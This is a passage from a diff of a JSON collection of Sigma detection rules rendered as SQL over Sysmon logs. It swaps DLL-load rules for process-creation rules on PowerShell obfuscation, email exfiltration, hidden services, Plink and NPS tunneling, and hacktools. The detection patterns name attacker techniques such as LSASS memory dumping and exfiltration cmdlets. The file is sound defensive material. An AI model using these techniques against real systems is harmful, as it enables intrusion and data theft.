Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2hhZG93Y29we%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NoYWRvd2NvcH%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TaGFkb3djb3B5%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2NoZWR1bGVkSm9i%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NjaGVkdWxlZEpvY%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TY2hlZHVsZWRKb2%' ESCAPE '\\') OR 
(CommandLine LIKE '%VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfUHJvY2Vzc%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1Byb2Nlc3%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Qcm9jZXNz%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfVXNlckFjY291bn%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1VzZXJBY2NvdW50%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Vc2VyQWNjb3Vud%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfTG9nZ2VkT25Vc2Vy%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX0xvZ2dlZE9uVXNlc%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Mb2dnZWRPblVzZX%' ESCAPE '\\')))" ], - "filename": "image_load_dll_vsstrace_susp_load.yml" + "filename": "proc_creation_win_powershell_base64_wmi_classes.yml" }, { - "title": "Pingback Backdoor DLL Loading Activity", - "id": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", - "status": "experimental", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Potential PowerShell Obfuscation Via Reversed Commands", + "id": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", + "status": "test", + "description": "Detects the presence of reversed PowerShell commands in the CommandLine. 
This is often used as a method of obfuscation by attackers", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdtc.exe' ESCAPE '\\' AND ImageLoaded LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%hctac%' ESCAPE '\\' OR CommandLine LIKE '%kaerb%' ESCAPE '\\' OR CommandLine LIKE '%dnammoc%' ESCAPE '\\' OR CommandLine LIKE '%ekovn%' ESCAPE '\\' OR CommandLine LIKE '%eliFd%' ESCAPE '\\' OR CommandLine LIKE '%rahc%' ESCAPE '\\' OR CommandLine LIKE '%etirw%' ESCAPE '\\' OR CommandLine LIKE '%golon%' ESCAPE '\\' OR CommandLine LIKE '%tninon%' ESCAPE '\\' OR CommandLine LIKE '%eddih%' ESCAPE '\\' OR CommandLine LIKE '%tpircS%' ESCAPE '\\' OR CommandLine LIKE '%ssecorp%' ESCAPE '\\' OR CommandLine LIKE '%llehsrewop%' ESCAPE '\\' OR CommandLine LIKE '%esnopser%' ESCAPE '\\' OR CommandLine LIKE '%daolnwod%' ESCAPE '\\' OR CommandLine LIKE '%tneilCbeW%' ESCAPE '\\' OR CommandLine LIKE '%tneilc%' ESCAPE '\\' OR CommandLine LIKE '%ptth%' ESCAPE '\\' OR CommandLine LIKE '%elifotevas%' ESCAPE '\\' OR CommandLine LIKE '%46esab%' ESCAPE '\\' OR CommandLine LIKE '%htaPpmeTteG%' ESCAPE '\\' OR CommandLine LIKE '%tcejbO%' ESCAPE '\\' OR CommandLine LIKE '%maerts%' ESCAPE '\\' OR CommandLine LIKE '%hcaerof%' ESCAPE '\\' OR CommandLine LIKE '%retupmoc%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine 
LIKE '%-EncodedCommand%' ESCAPE '\\' AND CommandLine LIKE '%rahc%' ESCAPE '\\')))" ], - "filename": "image_load_malware_pingback_backdoor.yml" + "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml" }, { - "title": "WMI Persistence - Command Line Event Consumer", - "id": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", - "status": "test", - "description": "Detects WMI command line event consumers", - "author": "Thomas Patzke", + "title": "Email Exifiltration Via Powershell", + "id": "312d0384-401c-4b8b-abdf-685ffba9a332", + "status": "experimental", + "description": "Detects email exfiltration via powershell cmdlets", + "author": "Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)", "tags": [ - "attack.t1546.003", - "attack.persistence" + "attack.exfiltration" ], "falsepositives": [ - "Unknown (data set is too small; further testing needed)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbemcons.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND CommandLine LIKE '%Get-Recipient%' ESCAPE '\\' AND CommandLine LIKE '%-ExpandProperty%' ESCAPE '\\' AND CommandLine LIKE '%EmailAddresses%' ESCAPE '\\' AND CommandLine LIKE '%SmtpAddress%' ESCAPE '\\' AND CommandLine LIKE '%-hidetableheaders%' ESCAPE '\\')" ], - "filename": "image_load_wmi_persistence_commandline_event_consumer.yml" + "filename": "proc_creation_win_powershell_email_exfil.yml" }, { - "title": "VBA DLL Loaded Via Office Application", - "id": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", + "title": "Network Reconnaissance Activity", + "id": "e6313acd-208c-44fc-a0ff-db85d572e90e", "status": 
"test", - "description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.", - "author": "Antonlovesdnb", + "description": "Detects a set of suspicious network related commands often used in recon stages", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.discovery", + "attack.t1087", + "attack.t1082", + "car.2016-03-001" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\VBE7.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBEUI.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBE7INTL.DLL' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%nslookup%' ESCAPE '\\' AND CommandLine LIKE '%\\_ldap.\\_tcp.dc.\\_msdcs.%' ESCAPE '\\')" ], - "filename": "image_load_office_vbadll_load.yml" + "filename": "proc_creation_win_nslookup_domain_discovery.yml" }, { - "title": "Suspicious Volume Shadow Copy Vssapi.dll Load", - "id": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", + "title": "Abuse of Service Permissions to Hide Services Via Set-Service", + "id": "514e4c3a-c77d-4cde-a00f-046425e2301e", "status": "experimental", - "description": "Detects the image load of VSS DLL by uncommon executables", - "author": "frack113", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet 
to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Unknown" + "Rare intended use of hidden services" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\'))" ], - "filename": "image_load_dll_vssapi_susp_load.yml" + "filename": "proc_creation_win_powershell_hide_services_via_set_service.yml" }, { - "title": "Potential DLL Sideloading Via VMware Xfer", - "id": "9313dc13-d04c-46d8-af4a-a930cc55d93b", + "title": "PUA - NPS Tunneling Tool Execution", + "id": "68d37776-61db-42f5-bf54-27e87072d17e", "status": "experimental", - "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to 
sideload arbitrary DLL", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of NPS, a port forwarding and intranet penetration proxy server", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\glib-2.0.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\npc.exe' ESCAPE '\\' OR (CommandLine LIKE '% -server=%' ESCAPE '\\' AND CommandLine LIKE '% -vkey=%' ESCAPE '\\' AND CommandLine LIKE '% -password=%' ESCAPE '\\') OR CommandLine LIKE '% -config=npc%' ESCAPE '\\' OR ((Hashes LIKE '%MD5=AE8ACF66BFE3A44148964048B826D005%' ESCAPE '\\' OR Hashes LIKE '%SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856%' ESCAPE '\\') OR md5 = 'ae8acf66bfe3a44148964048b826d005' OR sha1 = 'cea49e9b9b67f3a13ad0be1c2655293ea3c18181' OR sha256 = '5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856')))" ], - "filename": "image_load_side_load_vmware_xfer.yml" + "filename": "proc_creation_win_pua_nps.yml" }, { - "title": "Aruba Network Service Potential DLL Sideloading", - "id": "90ae0469-0cee-4509-b67f-e5efcef040f7", + "title": "Wusa Extracting Cab Files From Suspicious Paths", + "id": "c74c0390-3e20-41fd-a69a-128f0275a5ea", "status": "experimental", - "description": "Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking", + 
"description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1574.001", - "attack.t1574.002" + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\arubanetsvc.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcr100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpapi.dll' ESCAPE '\\')) AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE 
'%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_aruba_networks_virtual_intranet_access.yml" + "filename": "proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml" }, { - "title": "Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded", - "id": "bdc64095-d59a-42a2-8588-71fd9c9d9abc", + "title": "Potential PowerShell Obfuscation Via WCHAR", + "id": "e312efd0-35a1-407f-8439-b8d434b438a6", "status": "test", - "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", - "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "description": "Detects suspicious encoded character syntax often used for defense evasion", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND Signed = 'false')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%(WCHAR)0x%' ESCAPE '\\')" ], - "filename": "image_load_dll_dbghelp_dbgcore_unsigned_load.yml" + "filename": "proc_creation_win_powershell_obfuscation_via_utf8.yml" }, { - "title": "DLL Load By System Process From Suspicious Locations", - "id": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", + "title": "Potential Signing Bypass Via 
Windows Developer Features", + "id": "a383dec4-deec-4e6e-913b-ed9249670848", "status": "experimental", - "description": "Detects when a system process (ie located in system32, syswow64...etc) loads a DLL from a suspicious location such as %temp%", + "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\setup.exe%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' AND Image LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SystemSettingsAdminFlows.exe' ESCAPE '\\' OR OriginalFileName = 'SystemSettingsAdminFlows.EXE') AND 
CommandLine LIKE '%TurnOnDeveloperFeatures%' ESCAPE '\\' AND (CommandLine LIKE '%DeveloperUnlock%' ESCAPE '\\' OR CommandLine LIKE '%EnableSideloading%' ESCAPE '\\'))" ], - "filename": "image_load_susp_dll_load_system_process.yml" + "filename": "proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" }, { - "title": "Wmiprvse Wbemcomn DLL Hijack", - "id": "7707a579-e0d8-4886-a853-ce47e4575aaa", + "title": "Execution via WorkFolders.exe", + "id": "0bbc6369-43e3-453d-9944-cae58821c173", "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", + "author": "Maxime Thiebaut (@0xThiebaut)", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the uncommon Windows Work Folders feature." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\control.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\WorkFolders.exe' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\'))" ], - "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "proc_creation_win_susp_workfolders.yml" }, { - "title": "Suspicious Volume Shadow Copy VSS_PS.dll Load", - "id": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", - "status": "experimental", - "description": "Detects the image load of vss_ps.dll by uncommon executables", - "author": "Markus Neis, @markus_neis", + "title": "Suspicious Plink Port Forwarding", + "id": "48a61b29-389f-4032-b317-b30de6b95314", + "status": "test", + "description": "Detects suspicious Plink tunnel port forwarding to a local port", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ - "Unknown" + "Administrative activity using a remote port forwarding to a local port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vss\\_ps.dll' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\clussvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\dismhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\inetsrv\\\\appcmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE 
'\\' OR Image LIKE '%\\\\searchindexer.exe' ESCAPE '\\' OR Image LIKE '%\\\\srtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\tiworker.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\SystemPropertiesAdvanced.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (CommandLine LIKE 'C:\\\\$WinREAgent\\\\Scratch\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description = 'Command-line SSH, Telnet, and Rlogin client' AND CommandLine LIKE '% -R %' ESCAPE '\\')" ], - "filename": "image_load_dll_vss_ps_susp_load.yml" + "filename": "proc_creation_win_plink_port_forwarding.yml" }, { - "title": "DLL Sideloading Of ShellChromeAPI.DLL", - "id": "ee4c5d06-3abc-48cc-8885-77f1c20f4451", - "status": "experimental", - "description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". 
One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - PurpleSharp Execution", + "id": "ff23ffbc-3378-435e-992f-0624dcf93ab4", + "status": "test", + "description": "Detects the execution of the PurpleSharp adversary simulation tool", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1587", + "attack.resource_development" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\ShellChromeAPI.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\purplesharp%' ESCAPE '\\' OR OriginalFileName = 'PurpleSharp.exe' OR (CommandLine LIKE '%xyz123456.exe%' ESCAPE '\\' OR CommandLine LIKE '%PurpleSharp%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_shell_chrome_api.yml" + "filename": "proc_creation_win_hktl_purplesharp_indicators.yml" }, { - "title": "Potential DLL Sideloading Via comctl32.dll", - "id": "6360757a-d460-456c-8b13-74cf0e60cceb", + "title": "PUA - 3Proxy Execution", + "id": "f38a82d2-fba3-4781-b549-525efbec8506", "status": "experimental", - "description": "Detects potential DLL sideloading using 